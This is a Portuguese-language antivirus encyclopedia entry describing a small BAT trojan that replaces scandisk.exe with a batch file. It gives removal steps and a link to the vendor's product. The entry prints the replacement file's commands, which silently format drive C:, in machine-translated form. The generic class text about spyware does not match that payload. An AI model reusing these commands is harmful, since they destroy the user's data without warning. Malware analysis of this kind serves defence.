Classe principal: TrojWare
Os cavalos de Tróia são programas mal-intencionados que executam ações que não são autorizadas pelo usuário: eles excluem, bloqueiam, modificam ou copiam dados e interrompem o desempenho de computadores ou redes de computadores. Ao contrário dos vírus e worms, as ameaças que se enquadram nessa categoria não conseguem fazer cópias de si mesmas ou se auto-replicar. Os cavalos de Tróia são classificados de acordo com o tipo de ação que executam em um computador infectado.Classe: Trojan
Um programa malicioso projetado para espionar eletronicamente as atividades do usuário (interceptar entradas de teclado, fazer capturas de tela, capturar uma lista de aplicativos ativos, etc.). As informações coletadas são enviadas ao cibercriminoso por vários meios, incluindo e-mail, FTP e HTTP (enviando dados em uma solicitação).Plataforma: BAT
No platform descriptionDescrição
Detalhes técnicos
Este Trojan tem uma carga maliciosa. É um arquivo BAT. Tem 246 bytes de tamanho.
Carga útil
Quando lançado, o Trojan excluirá o seguinte arquivo:
C: windowscommandscandisk.exe
Ele irá substituí-lo com o seguinte arquivo:
C: windowscommandscandisk.bat
que contém o seguinte código:
@echo off
romper
formato c: / autotest / q / u
romper
formato c: / autotest / q / u
O resultado é que quando "scandisk" é chamado, uma tentativa será feita para formatar C: sem exibir um aviso.
Instruções de remoção
Se o seu computador não tiver um antivírus atualizado ou não tiver uma solução antivírus, siga as instruções abaixo para excluir o programa mal-intencionado:
- Exclua o arquivo Trojan original (o local dependerá de como o programa penetrou originalmente na máquina da vítima).
- Exclua o arquivo criado pelo Trojan: C: windowscommandscandisk.bat
- Restaure o arquivo que o Trojan excluiu do backup: C: windowscommandscandisk.exe
- Atualize seus bancos de dados de antivírus e execute uma verificação completa do computador ( baixe uma versão de avaliação do Kaspersky Anti-Virus).
Saiba mais
Descubra as estatísticas das vulnerabilidades que se espalham em sua região statistics.securelist.com
Encontrou uma imprecisão na descrição desta vulnerabilidade? Avise-nos!